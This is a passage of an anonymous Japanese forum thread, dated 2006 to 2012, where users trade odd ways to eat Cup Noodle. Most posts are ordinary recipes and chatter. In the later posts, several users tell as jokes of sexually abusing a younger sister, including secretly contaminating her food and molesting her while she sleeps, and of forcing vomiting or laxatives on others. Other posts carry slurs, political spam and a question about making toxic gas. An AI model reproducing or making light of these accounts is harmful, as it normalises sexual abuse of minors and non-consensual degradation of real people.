324 :すぐ名無し、すごく名無し:2006/12/05(火) 20:52:05 ID:TZkMMPcR.net
二時間放置後、マクマク食べる

325 :すぐ名無し、すごく名無し:2006/12/05(火) 20:52:44 ID:icFL2MK1.net
>>323
まじっすか?セロファン剥いて拭いたら取れたんで、とりあえず喰ってみたけど
なんかネギがネチョネチョしていた気がしたけどおいしゅういただけました

326 :すぐ名無し、すごく名無し:2006/12/05(火) 20:53:34 ID:TZkMMPcR.net
10時間煮込んだスープをお湯のかわりに使う

327 :すぐ名無し、すごく名無し:2006/12/06(水) 03:23:23 ID:cy4KJ/OT.net
>>100
ガキの頃それ見た
で、やってみようとしたら親に怒られた
今思えば餅にチョコ塗って焼いたりふざけた漫画だった

328 :すぐ名無し、すごく名無し:2006/12/10(日) 00:04:42 ID:umYGmSAg.net
味噌うまかった…定番化してほしい…でも味噌に限ればスーパーカップが今までは一番だったなぁ!

329 :すぐ名無し、すごく名無し:2006/12/11(月) 23:48:51 ID:TCXRDS6H.net
カップヌードルには限らないんだけど
カップ麺って、外国でも食べられてるよね
欧米人って、すすらずにどうやって食べてるんだろう
スープから麺持ち上げて、口に入れて、噛み切って食べてるのかな

330 :すぐ名無し、すごく名無し:2006/12/15(金) 23:19:13 ID:yeYFCATv.net
パスタ食べるようだから
少しはすすれるんじゃない?。

331 :すぐ名無し、すごく名無し:2006/12/16(土) 02:49:25 ID:WY1znlpl.net
>>328
確かに

332 :すぐ名無し、すごく名無し:2006/12/16(土) 07:14:47 ID:haKhxXPu.net
>>329
日本よりも麺が短いはずだよ。

333 :すぐ名無し、すごく名無し:2007/02/06(火) 16:05:28 ID:SHqLaU9c.net
>>329
シュワ知事が一口で食ってたな

334 :すぐ名無し、すごく名無し:2007/02/17(土) 09:41:57 ID:aUKgojsV.net
普通のカップヌードルに醤油をたっぷり入れて食う

335 :すぐ名無し、すごく名無し:2007/02/17(土) 18:07:04 ID:W+ThsSE7.net
ピーナはシーフードが好きでおみやげに買って帰る!日本の方がうまいらしい?

336 :すぐ名無し、すごく名無し:2007/02/19(月) 15:59:47 ID:GxZyXpBQ.net
えびと肉を省いて食ってる。

337 :すぐ名無し、すごく名無し:2007/02/27(火) 09:09:07 ID:cIwgaK2W.net
☆保守☆

338 :すぐ名無し、すごく名無し:2007/02/27(火) 22:27:26 ID:uz+Rk4Mq.net
俺が子供の頃、学校の帰り道に、突然黄色いカップヌードルの自動販売機が出現。
物珍しさから友達とお金を出し合って購入、食してみるも、やたらとショッパイ。
ベビースターラーメンなんかよりも何倍もしょっぱい。
それでもエビやら玉子やら入ってるし、麺を大きい塊のままバリバリ食べるのが
新鮮で、よく買って食べていた。
暫らく後、カップヌードルとはお湯を入れて食うものだと人から聞いて知りました。




339 :すぐ名無し、すごく名無し:2007/03/08(木) 22:20:56 ID:hlxMOWqL.net
肉は排除するな。だって糞不味いんだもん。

340 :すぐ名無し、すごく名無し:2007/03/08(木) 22:24:51 ID:+bC7SB2E.net
>>339 その余裕がうらやますい。

341 :すぐ名無し、すごく名無し:2007/03/08(木) 22:36:00 ID:A6BDN7ny.net
日本茶で作るの。
最後にナンプラー数滴。

342 :すぐ名無し、すごく名無し:2007/03/09(金) 15:19:12 ID:lUUIG8qq.net
お湯を入れて全部吸うまで放置。
それを飯の上に乗せて食う。
タイに行った時にタイ人がやってた。
ちなみにその時食ってたのはカップヌードルトムヤムクン味w

343 :すぐ名無し、すごく名無し:2007/03/22(木) 02:16:21 ID:wWqKxlmi.net
ぺぺローション入れてとろみ風にしていただく うまいぞ

344 :すぐ名無し、すごく名無し:2007/03/22(木) 21:48:36 ID:D4CVUXfM.net
シーフードヌードルから海鮮系の具を抜いて、カレールウ少し入れてからお湯をかける。
カレーヌードルみたいでウマイ!

345 :すぐ名無し、すごく名無し:2007/03/23(金) 07:25:10 ID:X+LC/2v4.net
カレーヌードル買えよw

346 :すぐ名無し、すごく名無し:2007/04/11(水) 10:27:43 ID:yHqaiBUP.net
http://news.ameba.jp/2007/04/4153.php

347 :すぐ名無し、すごく名無し:2007/04/13(金) 08:55:12 ID:7Fq6PFRg.net
小さい頃、麺を 皿にとってフーフー冷まして食べてた。なんかやけにうまかった記憶ある

348 :すぐ名無し、すごく名無し:2007/05/02(水) 01:55:57 ID:+UKW6Hrz.net
>>343ゲッー

349 :すぐ名無し、すごく名無し:2007/05/21(月) 20:31:11 ID:e2b5KeEZ.net
お好み焼き用の小エビ(オキアミ?)を沢山入れ、少量の酒をふってから、お湯を入れる。
小エビから出汁がでてウマー。

350 :すぐ名無し、すごく名無し:2007/05/29(火) 23:21:18 ID:VH0FEHjH.net
小エビを少しフライパンで煎れよ

351 :すぐ名無し、すごく名無し:2007/05/30(水) 06:59:25 ID:X7goBPDE.net
欧風チーズカレーの麺を粉々にして少な目にお湯を入れて・・・
白飯にかけてスープカレーで食べる。

352 :すぐ名無し、すごく名無し:2007/05/30(水) 11:45:07 ID:Gw35oBr9.net
ツナ缶(油ごと)、マヨネーズ、海苔、納豆、粉チーズ、抹茶プリッツ部屋にあるものを器を変えてシーフードに全部乗せ!(お湯でなく爽健美茶もどし)


うーん…生きる気力はなくなるが生きてる事は実感できた。

353 :すぐ名無し、すごく名無し:2007/05/30(水) 23:35:07 ID:oeBSLDPg.net
なんでもかんでも入れるなよ もっとシンプルにな

354 :すぐ名無し、すごく名無し:2007/05/31(木) 09:22:26 ID:w6n94PaZ.net
漏れちゃう

きゃぁぁぁぁっぁ

355 :すぐ名無し、すごく名無し:2007/08/17(金) 17:51:30 ID:R6C3uuhV.net
このスレにはミサトさんが大勢居るようで…

エビチュビールばっか飲んでんなよ!!

356 :すぐ名無し、すごく名無し:2007/08/17(金) 21:00:34 ID:9EHznns7.net
まず麺は全部取り出して捨てる。残った具と汁で雑炊にしたり、パン付けて食べたり、春雨入れたりしたっけw

357 :すぐ名無し、すごく名無し:2007/08/18(土) 00:38:58 ID:jaMGMxVP.net
変な肉とえびを捨てて食べる

358 :すぐ名無し、すごく名無し:2007/08/21(火) 03:16:40 ID:Q/wqEbxo.net
>>159
いっぺん氏んでこいww

359 :すぐ名無し、すごく名無し:2007/08/23(木) 21:10:43 ID:gFpS02HC.net
アタシは半分ちょいお湯を入れて、3分まって後は水か氷

360 :カップヌードルの残りで中華粥:2007/09/01(土) 09:42:32 ID:9LKbkkkh.net
以前、TV番組トリビアの泉で「カップ麺の残り汁でフランスパンを食べる」企画があったが、
残り汁にご飯やパン等を足して食べた経験をお持ちの方も多いかもしれない。
【残り汁で中華粥】手早く出来る簡単レシピ。
・まずフライパンに残り汁を入れ、煮立つまで加熱する。(残り物野菜をぶち込んでも可)
・煮立ったら、御茶碗半分ほどのご飯を投入。
・香り付けにごま油ひと垂らし、オイスターソース小さじ1も入れる。胡椒もお好みで。
・卵一個をかき混ぜながら円を描く様に垂らし入れる。
・仕上げにさっとかき混ぜたら、火を止めて器に盛る。
・浅葱や刻みネギ、ゴマ等お好みで振り掛けて出来あがり。
カップヌードルの汁で作ったとは思えぬ、中華飯店っぽい朝粥の出来あがりw
茹でたチンゲン菜やらザー菜をトッピングするともっとそれっぽくなる。
貧乏臭い?いえいえ、やってみると案外いけますよ。
注意:残り汁はすぐ使う。保存すると痛むのでご注意。

361 :すぐ名無し、すごく名無し:2007/09/01(土) 09:48:02 ID:9LKbkkkh.net
円楽師匠の娘が子供の頃に、前の日のすき焼きの残り汁を入れて食べるのをよくやっていたとか。
真似してみたら、凄くまずかった・・・

362 :すぐ名無し、すごく名無し:2007/09/27(木) 11:28:50 ID:BUOJWXys.net
まず具材の質が違ってたりして

363 :すぐ名無し、すごく名無し:2007/12/07(金) 09:08:42 ID:NHJJTiMo.net
ぬこ舌なおれは、夜寝る前に熱湯を注ぎ、次の朝、起きぬけに一気食いする。
コーラックより効く。

364 :すぐ名無し、すごく名無し:2007/12/07(金) 09:25:59 ID:Epv67lsD.net
ロザンヌのバタークロッチを入れる

365 :すぐ名無し、すごく名無し:2007/12/08(土) 22:23:56 ID:DJUQk7wA.net
邪道っていってもあんまり手間のかかるものは
商品の本質上邪道なんじゃないか。ああ、それでいいのか(笑)

カップヌードルしょうゆを30個ほどもらって
毎日食っていて飽きた末に編み出した技。
普通に作った後「酢」を大量に入れる。
なんでかっていわれても困るけど
どぼどぼと大量の酢を入れて食うと
格別うまいわけではないけれど飽きない。
安い穀物酢はだめだった。純米酢がお勧め。

366 :すぐ名無し、すごく名無し:2007/12/10(月) 10:29:24 ID:iVuOhYZf.net
お湯の代わりに水を入れて放っといてもくえるんかな?
朝鮮してみるか。

367 :すぐ名無し、すごく名無し:2007/12/10(月) 19:31:35 ID:rjUHLqYC.net
カレー味にブルドックソースをスプーン1杯入れると以外に旨い。
シーフードに梅干し一つ入れると旨い。
醤油味に、おかか入れると旨い!

トマチリにとろけるチーズ一枚入れると旨い!

368 :すぐ名無し、すごく名無し:2007/12/11(火) 20:16:25 ID:SYsHxpKa.net
カップヌードルを粉々に砕き、飯を炊く時に入れるとたまらんぞ。
どの味でも可。

369 :すぐ名無し、すごく名無し:2007/12/12(水) 03:17:00 ID:pVFaXoBv.net
粉々に砕いたのを餃子の餡に混ぜる。
やったことないけどね

370 :すぐ名無し、すごく名無し:2008/01/28(月) 04:31:01 ID:ISWRlCTw.net
社食にお湯と緑茶のボタンがついている給湯器がある。ためしに緑茶を入れてみた。美味かったんで周囲に広めているがオバさんばかりなので続いてくれない。

371 :すぐ名無し、すごく名無し:2008/01/28(月) 05:22:23 ID:hhXeXPIe.net
 枚方の精神分裂病→       雨 ダルマ←性犯罪者
この糞スレッドを立てたオカマ→  ヨ    ←凶悪犯

372 :すぐ名無し、すごく名無し:2008/03/01(土) 01:47:29 ID:6FPNqRbG.net
シーフードにラー油入れると最高です

373 :すぐ名無し、すごく名無し:2008/03/06(木) 19:50:31 ID:RdrV+XBO.net
【小麦高騰】日清が先陣!ついに7〜11%の値上げへ
http://food8.2ch.net/test/read.cgi/nissin/1188989611/l50

374 :すぐ名無し、すごく名無し:2008/03/19(水) 05:52:48 ID:IbjxbMYw.net
カップヌードルの日清食品は北京オリンピックに資金を出していることと同じだと思います。
ロッテリアとクリスピー・クリーム・ドーナツはロッテグループ。ロッテはオリンピックに資金を出してます。

亡命者の話を元に作った漫画。これが民族を殺戮すること。
http://sv2.st-
kamomo.com/hello/dat/ufa29409.43460.jpg上下くっけて

<遺体の写真です>
心臓の弱い人は見ないほうがいいです。
でも、これが現実。
http://www.tchrd.org/press/2008/pr20080318c.html
中共は「暴動の鎮圧に際しては、致命傷を与える武器は一切使っていない」と言ってたが
観光客がBBCのインタビューに「36台の戦車を見た」「まるで戒厳令だ。動くものは何でも撃つ」
って答えてる。
http://www.nicovideo.jp/watch/sm2689923
胡錦濤来日時に日本中をチベット旗だらけにするOFF4
http://sports11.2ch.net/test/read.cgi/offmatrix/1205860456/
高村外相「日本はオリンピックボイコットしないよ」
http://namidame.2ch.net/test/read.cgi/news/1205806603/601-700

【↓これらの企業はチベット大虐殺五輪スポンサー企業です。
 これらの企業の商品を買うことは虐殺に加担したと等しいのです】
「虐殺したら、スカッとさわやかコカ・コーラ」コカ・コーラ 「I'm loving it(虐殺)」マクドナルド 「Die your dreams」トヨタ
「フリーダム、虐殺の自由を掴め。カップヌードル」日清食品 「明日の虐殺の素」味の素 「ビエラは虐殺もくっきり」パナソニック
「虐殺は〜ロッテ〜♪」ロッテ 「チベット大虐殺2.0」DoCoMo
・GE ・パナソニック ・コカコーラ ・マクドナルド ・サムスン ・VISA ・OMEGA
・ジョンソン&ジョンソン ・マニュライフ生命 ・lenovo ・アディダス ・フォルクスワーゲン
・MIZUNO ・ダイムラークライスラー ・コダック


375 :すぐ名無し、すごく名無し:2008/03/19(水) 05:55:09 ID:5+pa2IuD.net
じゃーどーぞ。ε=┏( ・_・)┛

376 :すぐ名無し、すごく名無し:2008/03/19(水) 07:17:04 ID:gpRN0W69.net
>>372
同意。
あと、シーフードにラー油+お酢を入れても旨いよ。


377 :すぐ名無し、すごく名無し:2008/04/06(日) 15:38:35 ID:x0bL83Qv.net
木村拓哉「足が長く見えるように修正しろ」の注文は
ttp://ameblo.jp/uraurageinou/entry-10071153897.html
ジャニーズ事務所の看板グループ、SMAP。
その中でも、キムタクこと木村拓哉はもはや“別格”。
ところが、業界内では数年前からキムタクを煙たがる声も上がっているという。
その理由は、写真や映像の修整にうるさいからだとか…。

「実際に会ってみると分かるんですが、想像以上のチビ、という
か短足なんです。これは業界内でも究極のタブーとなっている
だけでなく、様々な現場で厳しい規制が敷かれています」(月刊誌記者)
「足が長く見えるように写真を修整しろ」といった注文などは
当たり前で、最近ではさらに要求がエスカレートしている
「最近は映像にまで文句を言ってくるんです。
ジャニーズに映像素材を見せると『このカットととこのカットで
よろしく』の一言。無理やりにでも繋げなければならないので、
編集担当は四苦八苦です
『これならCGでやった方がいいんじゃないか』って意見が
出てくるほどですよ(笑)」(CM制作関係者)
彼の無理な注文にウンザリしている関係が勃発しているようだ。
ということで雑誌で見るキムタクの写真にはかなり手の込んだ
修正が入っているということだろうか?(苦笑)
キムタクは「足が短い」「シークレットブーツを履いている」など
はよく聞く噂。テレビで見る印象とのギャップにびっくりするとか…。

378 :すぐ名無し、すごく名無し:2008/05/19(月) 00:04:53 ID:KKh1jV5o.net
CMにキムタク使うなら、もっと安くしてよ。
キムタク嫌いだー
孝太郎がいい…
そういえば何故か、ジャニーズだね…
知人によると日清のカレンダーにはCMの俳優刷ってあるんだけどジャニーズはいれらんないとか…

379 :すぐ名無し、すごく名無し:2008/08/13(水) 12:50:32 ID:NaS9eYup.net
カップヌードルカレーに、とろけるスライスチーズはもちろんマヨネーズを少し入れると味のトゲトゲしさが無くなりマイルドになって美味しいよ。

380 :すぐ名無し、すごく名無し:2008/08/14(木) 08:43:29 ID:TDirnbba.net
カップヌードルチーズマヨカレー‥‥?!

381 :すぐ名無し、すごく名無し:2008/08/16(土) 07:00:42 ID:RvzpPKdN.net
醤油味を適当にバラしてご飯と一緒に炊き込んでみた。
なかなかイケる。

382 :すぐ名無し、すごく名無し:2008/08/18(月) 01:47:03 ID:LjkfpJ30.net
シーフードにオイスターソース
ヤバイ

383 :すぐ名無し、すごく名無し:2008/08/19(火) 04:05:34 ID:vojCiZgO.net
沸騰前のお湯で作る。(60°前後)

384 :すぐ名無し、すごく名無し:2008/08/25(月) 19:52:52 ID:hTcmfDh2.net
人肌の湯で20分ふやかして
オナホールにして一発抜いてから
再度熱湯を注いで妹に食わせてた
卵の白身を入れたとウソをついて。
そのおかげだろうか、妹は初潮が早かった。

385 :すぐ名無し、すごく名無し:2008/08/25(月) 22:25:23 ID:IUq78TQH.net
邪道過ぎだろwwwww

386 :すぐ名無し、すごく名無し:2008/08/26(火) 09:04:38 ID:UKx/SNXa.net
>>384
その後妹をおいしく頂いたんですね、分かります。

387 :すぐ名無し、すごく名無し:2008/08/27(水) 19:17:22 ID:s/6WyDrR.net
>>384
妹カワイソス。
俺は眠ってる妹のマンコ見たり、浣腸して寝糞させて泣かせたりしたが
お前ほどじゃない。

388 :すぐ名無し、すごく名無し:2008/08/27(水) 22:14:08 ID:JTz2oS7/.net
↑↑
じゃけ 何か?




バカかお前は?(笑)



バカかお前は?(笑)



389 :すぐ名無し、すごく名無し:2008/08/28(木) 06:55:31 ID:Srmsamju.net
原●広島人キター

390 :すぐ名無し、すごく名無し:2008/08/29(金) 11:57:15 ID:D5/5qfFT.net
土砂降りの雨の中、泣きながら食う

391 :すぐ名無し、すごく名無し:2008/08/30(土) 09:19:50 ID:YFLm4wXh.net
俺は作り方は普通だが、
風呂の床にぶちまけてから
這いつくっばって食うのが好きだ。
スープは流れてしまうから予め洗面器にとっておくが。

中学生のころ道端のラーメンゲロを野良犬が美味そうに
ハフハフ食ってるのを見て激しく萌え、この性癖が始まった。

392 :すぐ名無し、すごく名無し:2008/08/30(土) 09:29:17 ID:b3Veqoka.net
>>391
なんとなく分かる希ガス。自分も、教室内で授業中吐いてしまった女の子のゲボを片付け手伝いながら、一口食ったことがある。

393 :すぐ名無し、すごく名無し:2008/08/31(日) 18:14:39 ID:J5o5SgXZ.net
なんか常軌を逸してきたな

ちなみに俺は作ってから3日、夏は2日置いてから食べます

腐りかけが美味い

394 :すぐ名無し、すごく名無し:2008/08/31(日) 19:10:21 ID:C+KQMVSO.net
とろけるチーズと納豆とトッピングして、10分くらいおいて食べると
伸びた麺とチーズと納豆が絡み合って美味〜
味噌味がお薦め!

395 :すぐ名無し、すごく名無し:2008/09/01(月) 00:20:55 ID:mOD+Jk+a.net
うちの職場のバカが、昔初日の出暴走して富士山みながら喰ったカップラーメンが旨かったとかぬかしてやがった。
最高に邪道な食い方だと思った。

珍走、、市んでくれ

396 :すぐ名無し、すごく名無し:2008/09/01(月) 04:27:08 ID:7i2OXtXe.net
湯を入れた120秒後のMISO味に大さじスプーン一杯の八丁味噌を入れ90秒レンジでチンしたら美味しくなる

397 :すぐ名無し、すごく名無し:2008/09/01(月) 18:41:55 ID:4L8l2VSi.net
従姉妹に食わせて30分したところで
口に指を突っ込んで吐かせ、それを食った。
邪道だがマジでうまい。

398 :すぐ名無し、すごく名無し:2008/09/01(月) 20:56:35 ID:bOJM/xBw.net
野良犬に虫下し飲ませて回虫を出す。それをラーメンに足して食ったらまじウメエ

399 :すぐ名無し、すごく名無し:2008/09/01(月) 22:09:55 ID:zVgv8S7S.net
オカマのリサジロウに食わせて30分したところで
下剤を大量に飲ませて下から噴出させて、それを食するデリシャス
ややアブノだが感動は大きい

400 :すぐ名無し、すごく名無し:2008/09/06(土) 19:54:49 ID:WSWldAD7.net
彼女に食べてもらい、よく噛んでくちゃくちゃにしたのを
口移しで食べさせてもらうとおいしい

401 :すぐ名無し、すごく名無し:2008/09/16(火) 23:15:45 ID:fb9MewCn.net
マジレスすると
上下を逆さにして作る。(底を切り取ってお湯を入れる)
ふたがペラペラになって決壊wwwww

402 :すぐ名無し、すごく名無し:2008/09/23(火) 18:28:05 ID:Vzbxw5Z0.net
コンデンスミルクを入れる
マジで美味い

403 :すぐ名無し、すごく名無し:2008/09/23(火) 19:23:42 ID:tgGphh4l.net
まずヤカンに水を入れてわかす。
夏場なら2日目あたりで水が濁りはじめ、3日くらいで何かわいてくる。
後は頼むと言い残して自分のウチに帰る。

404 :すぐ名無し、すごく名無し:2008/09/23(火) 21:55:52 ID:WflqtoMJ.net
ヤキトリの缶詰ぶち込むと美味い

405 :すぐ名無し、すごく名無し:2008/10/23(木) 17:28:43 ID:ZrlK68y4.net
毒はダメですよ・・・。

406 :すぐ名無し、すごく名無し:2008/10/23(木) 17:31:18 ID:lD2IjGA3.net
予想通りスレが上がっててワラタw

407 :すぐ名無し、すごく名無し:2008/10/23(木) 17:48:39 ID:kmCEyqMV.net
http://news.tbs.co.jp/newseye/tbs_newseye3977429.html
おもいっきり名指し

408 :すぐ名無し、すごく名無し:2008/10/23(木) 18:07:48 ID:G8JiY6nu.net
このスレに ウィルスが・・・・・・

409 :すぐ名無し、すごく名無し:2008/10/23(木) 19:00:10 ID:0sfVtoeg.net

毒入りとかwwwwww
邪道過ぎるよ日清さんwwwwwwwwwwwwwwwwww

410 :すぐ名無し、すごく名無し:2008/10/23(木) 19:17:31 ID:TV2SsW7e.net
カップヌードルと何混ぜたら硫化水素出るの?

411 :すぐ名無し、すごく名無し:2008/10/23(木) 23:39:36 ID:yI73SZIS.net
短パンマン
名古屋はエ〜エ〜で♪
いろいろあるさ


412 :すぐ名無し、すごく名無し:2008/10/23(木) 23:58:14 ID:WZLR4VxN.net
http://www.yomiuri.co.jp/national/news/20081023-OYT1T00860.htm
横須賀でもカップめんから防虫剤成分

横須賀市は23日、9月27日に市内の男性から「薬品臭がする」と持ち込まれた
日本生活協同組合連合会が販売した「CO・OPカップラーメン」から、
防虫剤に使われるパラジクロロベンゼンやナフタレンが検出されていたと発表した。
男性は食べていないという。

(2008年10月23日23時42分 読売新聞)


413 :すぐ名無し、すごく名無し:2008/10/25(土) 09:58:20 ID:Cu7/lOOP.net
めんくらった

414 :すぐ名無し、すごく名無し:2008/11/03(月) 11:00:56 ID:CRODreXK.net
カップヌードルと防虫剤を一緒に置く

415 :すぐ名無し、すごく名無し:2008/11/03(月) 12:54:23 ID:EnvhDdJT.net
お前ら後ろ向きだな
俺はニオイ以外の異物混入の可能性が解決されたら
カップ麺にあえてニンニクとか移香させて食えないか試してみるぜ

416 :すぐ名無し、すごく名無し:2008/11/03(月) 13:16:23 ID:pk2KIp2y.net
ざるに入れて、スープは別にして食うのはうまいぞ。
http://g004.garon.jp/gdb/Gz/0R/aH/dE/CE/fK/5C/8A/iO/fy/UQ/yB1.jpg



417 :すぐ名無し、すごく名無し:2008/11/03(月) 16:58:37 ID:mQS8xWT8.net
      ,,        )      )
      ゙ミ;;;;;,_           (
       ミ;;;;;;;;、;:..,,.,,,,,
       i;i;i;i; '',',;^′..ヽ
       ゙ゞy、、;:..、)  }    )
        .¨.、,_,,、_,,r_,ノ′
      /;:;":;.:;";i; '',',;;;_~;;;′.ヽ
     ゙{y、、;:...:,:.:.、;:..:,:.:. ._  、}
     ".¨ー=v ''‐ .:v、,,、_,r_,ノ′
    /;i;i; '',',;;;_~⌒¨;;;;;;;;ヾ.ミ゙´゙^′..ヽ 
    ゙{y、、;:...:,:.:.、;、;:.:,:.:. ._  .、)  、}    強姦や大麻を隠蔽するジャニーズ。
    ".¨ー=v ''‐ .:v、冫_._ .、,_,,、_,,r_,ノ     そんなタレントを使ってる企業は、
  | /              \       都合の悪いことを隠蔽すると宣言したも同然。
  |/;| ‐-              \     実際、日清食品は事実を隠して毒をふりまいた。
 //;;/≠≡      ‐‐      ミミ     日清は日本人に対するテロ組織である。
ノ/;;;/   ~ヽ    ≠≡=× :::::::::::
 i;;;/ /f二!ヽi    r  __    ::::::::
 i;;| ´ヽ--‐´|    ∠`ー´ゝヾ::: ::::::
 i;;|   /  |    ヽ ̄~´    :::
 Y     /       ̄´   :::::
  |   //   ヘ        ::::::::
  |    (  ,- )\       ::
  ∧   ____二____         __ノ
  ∧  \i__i__i__i__i フ        /
   ∧   ヽ||||||||||||/       /;;;
   ∧   (二二ノ||      /;;;;;;
    ∧       ||    /;;;;;
     ∧      | |  /;;;

418 :すぐ名無し、すごく名無し:2008/11/04(火) 08:02:39 ID:b9ZOopVk.net
>>416グロ

419 :すぐ名無し、すごく名無し:2008/11/04(火) 23:48:03 ID:Glcm1Gbt.net
街中でカップラーメンを食べる大人にはなりたくない
ttp://pub.ne.jp/38moto/?entry_id=1640202

420 :すぐ名無し、すごく名無し:2008/11/12(水) 06:29:11 ID:qoYDfTCw.net
どんぶりに移し変えていただく

421 :すぐ名無し、すごく名無し:2008/11/12(水) 14:15:12 ID:eUybCckQ.net
とりあえず水を入れて三分待ってみる

422 :すぐ名無し、すごく名無し:2008/11/12(水) 15:09:59 ID:eCV9UuHJ.net
>>421
不覚にもワロタww

423 :すぐ名無し、すごく名無し:2008/11/13(木) 23:34:10 ID:wprWnrVd.net
上げ

424 :すぐ名無し、すごく名無し:2008/11/14(金) 08:08:08 ID:tXMsrik7.net
日清本社前で一口食って捨てる

425 :すぐ名無し、すごく名無し:2008/11/14(金) 11:42:47 ID:jvVEac9i.net
>>424
www

426 :すぐ名無し、すごく名無し:2009/04/02(木) 14:19:01 ID:++ss3AJy.net
>>424
その発想はなかったwww




427 :すぐ名無し、すごく名無し:2009/04/28(火) 22:15:36 ID:ELKWwawB.net
ぬるぬる秋山にぶっかけ

428 :すぐ名無し、すごく名無し:2009/04/28(火) 22:51:25 ID:Y93WNA4V.net
麺をチンチンに巻き付けて
食べてもらう

ふわたま、謎肉、エビは自分のB地区、へそに乗せて
食べてもらう

429 :すぐ名無し、すごく名無し:2009/04/28(火) 22:52:17 ID:Y93WNA4V.net
スープは股ぐらに貯水池状態にして
飲んでもらう

430 :すぐ名無し、すごく名無し:2009/06/27(土) 20:48:52 ID:EkB2pIrS.net
            :::;:: : : : : : : : }ミ川: : : :|:i : : : : : : : : :| 
 :::. :        :  :::.; : : |: |: : :| ̄`!: : : |:|: : : : : : : : : | 
  :::. :      ..  ::;:: : : : | :|: : :|  l:. : :幵 /i: : }: : : : :| 
  ::.. :     :  .::;::i: : 斗:キ⌒|  /: : :/⌒゙メ、//:/ : : | 
   :::.. :.   .:  .::; :|: : i:{:从W 〈: :/   |/|/:/:/:|: :′ 
   :::...  ...  ...::;|: :|: : |:|〃 ̄ヽ V〉〃 ̄ヽ}:/:/: /V  ここは変態さんの多いインターネッツですわね 
    ::.....  ...::::;八:.ト、 }|ヽiヽiヽ  /;ヽiヽiヽイ イ: /    
    ∧ ::...::: /|iT::ネ|: ヽ:{      ′   }: [/     
      { ヽ| |ノノ.|i:|: :|:|: : ト 、   t―‐ァ  /i: :} 
    _ト、Lj/} |i:{ ノ |: : |i i个 、 ` '′イi i/: / 
 r<  { | |7ヽ、⌒V: :|:┴!/|   ̄ 八i/: /   __ 
 {  ,_ェェ.L⊥.__{ノ、__ ∨:|- イ ム__r― '′ }:./ ̄ア´  ∠_ ̄) 
 j         `}ー'‐- 入:| |//::::i} ||  〃V   /--x   ハ「_ 
  }   ――ー-{    /  ヽ.Y:::::jト、¨¨´ / ./  / ヽ/: :| ヽ∧ 
  ヽ  --―‐r'__イ   /: l`¨: :∧ ̄   /_/: : : : : : :'.  __} 
   \_ __. イ-―‐/    / : : : : /: :ハ   /_  ̄フ: : : : :∨ 
    `ー┴ ´  /    /: : : : : : : : : }   ′ / ̄: : : : : : : : \ 

431 :すぐ名無し、すごく名無し:2010/10/22(金) 15:41:25 ID:KC27izqD.net
ワロタ

432 :すぐ名無し、すごく名無し:2010/10/26(火) 16:00:57 ID:dhxR16NW.net
シーフドヌードルとカップヌードル カレーとカップヌードルしおを大人買いです。
送料を考えるとついつい3ケース単位で購入
体に良くないと思いつつ、ついつい
tokyo23japanで買っています。
友達紹介して特別なご褒美も頂きました

433 :すぐ名無し、すごく名無し:2010/10/26(火) 19:36:21 ID:yZXm2/Dg.net
↑やるじゃん
これだけ あれば 通勤時の地下鉄のなかで 食ってくれ!

434 :すぐ名無し、すごく名無し:2010/10/26(火) 21:07:25 ID:uzYVkklP.net
中身を全部カップスターや金ちゃんヌードルの容器に入れかえて喰らう。

435 :すぐ名無し、すごく名無し:2010/10/28(木) 07:54:05 ID:ln0fsEjn.net
>>424
日清本社まで歩いて5分なんだがwww

436 :すぐ名無し、すごく名無し:2010/10/28(木) 14:08:58 ID:cuZ9hwFd.net
>>435
是非ともやってくれWWWW

437 :すぐ名無し、すごく名無し:2010/10/30(土) 17:48:30 ID:W0GNA/06.net
彼女のおしっこを沸騰させてお湯の代わりに入れた
物凄く臭かったww

438 :すぐ名無し、すごく名無し:2011/05/03(火) 19:27:19.28 ID:hdMdsoZV.net
カップヌードル最強はシーフードヌードルだろ?冷や飯入れても旨いし
http://hatsukari.2ch.net/test/read.cgi/news/1304414286/l50


439 :すぐ名無し、すごく名無し:2011/05/30(月) 17:13:33.14 ID:vjlMk+Z+.net
【奇跡のコラボ】日清、カップヌードル「シーフード×カレー」発売 40周年記念で新商品
http://hatsukari.2ch.net/test/read.cgi/news/1306742695/l50


440 :すぐ名無し、すごく名無し:2011/06/02(木) 21:59:37.66 ID:TwTxXBsI.net
牛乳とトマトジュースを1:1の割合であわせたものに半玉の玉葱を切って入れ鍋で煮立たせて塩こしょうコンソメで味付けし
シーフードヌードルの中身を鍋に入れる
シーチキン、粉チーズ、とろけるチーズ1枚を加え
片栗粉でとろみをつけて

出来上がったものを
麺だけ取り出し片栗粉をまぶし油で揚げる

カラッと揚げた麺をスープに戻して
出来上がり

441 :すぐ名無し、すごく名無し:2011/06/03(金) 00:08:27.21 ID:MNiuzt5N.net
さます
チンポいれる
だす
タベル

442 :すぐ名無し、すごく名無し:2011/06/03(金) 07:08:13.57 ID:zvb/kn8f.net
本当今さらだが>>419が許せん
こいつ体裁とか人の目気にする小心者だろ
生きるってのは食う寝る出すが基本だ
さらに食うってのは他の命を頂くって事だ
それが繁華街だろうがコンビニだろうが関係ない、地球での出来事だ
お前人間社会に染まりきって人間至上主義みたいな考え方だが、生きるってのはそんな甘くないぞ


443 : 忍法帖【Lv=3,xxxP】 :2011/06/03(金) 08:32:06.35 ID:BPKaqjJR.net
>>442

oioi野生のオキテから言うとまったく逆だぞ?

他社ので食事中とかのスキだらけの姿を晒すとかトンでもない
それに他のヤツに食料を奪われない為に見つからない場所で食うとか当たり前当たり前当たり前ェ〜


444 :すぐ名無し、すごく名無し:2011/06/13(月) 14:47:52.50 ID:DNXH35Ok.net
日清「シーフードカレーチーズヌードル」 本日発売
http://hatsukari.2ch.net/test/read.cgi/news/1307943943/l50


445 :すぐ名無し、すごく名無し:2011/06/15(水) 10:59:40.40 ID:yujDBDEC.net
出来上がったカップヌードルをもんじゃ焼きに入れて食うと美味いよ。

って今思いついた。

446 :すぐ名無し、すごく名無し:2011/06/26(日) 14:04:35.38 ID:8yQIejKj.net
ちんぽを入れて中出し

447 :すぐ名無し、すごく名無し:2011/07/05(火) 13:29:40.84 ID:8h2R1hwm.net
【食品】日清「カップヌードルごはん」を25日に全国発売 販売休止の人気商品[11/07/05]
http://toki.2ch.net/test/read.cgi/bizplus/1309838684/


448 :すぐ名無し、すごく名無し:2011/08/20(土) 08:08:20.90 ID:E5zfmcqg.net
アスクルのアウトレットで@58だ。
思う存分食え

449 :すぐ名無し、すごく名無し:2011/10/15(土) 09:46:15.14 ID:cDa+ZrVL.net
『カップヌードルご飯』を利用した、美味しいポップコーンの作り方
http://hato.2ch.net/test/read.cgi/nanbyou/1310271635/

450 :すぐ名無し、すごく名無し:2012/03/24(土) 03:25:59.88 ID:7yYuYTX9.net
